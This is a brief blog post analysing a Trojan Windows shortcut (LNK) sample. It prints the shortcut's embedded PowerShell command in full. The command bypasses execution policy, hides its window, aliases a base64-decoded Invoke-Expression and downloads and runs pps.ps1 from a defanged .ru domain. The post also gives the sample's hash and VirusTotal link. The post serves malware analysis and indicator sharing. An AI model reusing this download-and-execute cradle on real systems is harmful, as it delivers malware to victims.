Trojan malware – Microsoft Shortcut (LNK)


I downloaded this sample for malware analysis and change the extension to .LNK which is Microsoft Shortcut.

Right clicked on file and navigated to shortcut and found that there is target is PowerShell embedded

blg-2

Below is PowerShell script which will drop another PowerShell script from the URL.

URL is http[:]// timebounder[.]ru and downloading PowerShell script pps[.]ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(‘aWV4’));sal calc $je;$mM=((New-Object Net.WebClient)).DownloadString(‘http[:]//timebounder[.]ru/ pps.ps1’);calc $mM

blg-3

I tried running script but the website is down (http[:]// timebounder[.]ru) and unable to download PowerShell script.

Virustotal – https://www.virustotal.com/#/file/4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98/detection

SHA256 – 4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.